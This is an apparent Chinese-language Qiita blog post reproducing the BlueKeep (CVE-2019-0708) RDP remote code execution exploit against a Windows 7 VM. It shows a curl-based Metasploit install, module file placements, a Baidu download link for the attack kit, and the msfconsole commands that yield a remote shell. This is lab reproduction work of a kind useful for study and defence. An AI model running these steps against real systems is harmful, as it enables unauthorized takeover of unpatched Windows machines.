Help us understand the problem. What is going on with this article?

CVE-2019-0708远程桌面代码执行漏洞复现

漏洞环境

使用VMware Fusion安装Windows7 SP1模拟受害机

Windows7 SP1下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

Windows7 SP1

Exp

攻击工具准备

  • 1.使用如下命令一键安装metasploit-framework
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
  • 2.下载Reference中的攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb   ->   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

攻击命令

使用msfconsole进入metasploit-framework
进入以后使用reload_all重新加载0708rdp利用模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块
使用info查看工具相关信息以及设置

info

可见关键设置主要为RHOSTS\ RPORT \ target

使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构
这里我们使用的是VMware Fusion,那么target 3满足条件
使用exploit开始攻击,等待建立连接
exploit
建立连接以后,使用shell获得shell,再使用python获得交互式shell
交互式shell
随即完成攻击,成功拿到受害者主机权限
主机权限

Reference

https://github.com/rapid7/metasploit-framework/pull/12283/files
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://pan.baidu.com/s/1q-mbYQFtU1GBuJfThMk8VQ 提取码: mffr

Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
No comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
ユーザーは見つかりませんでした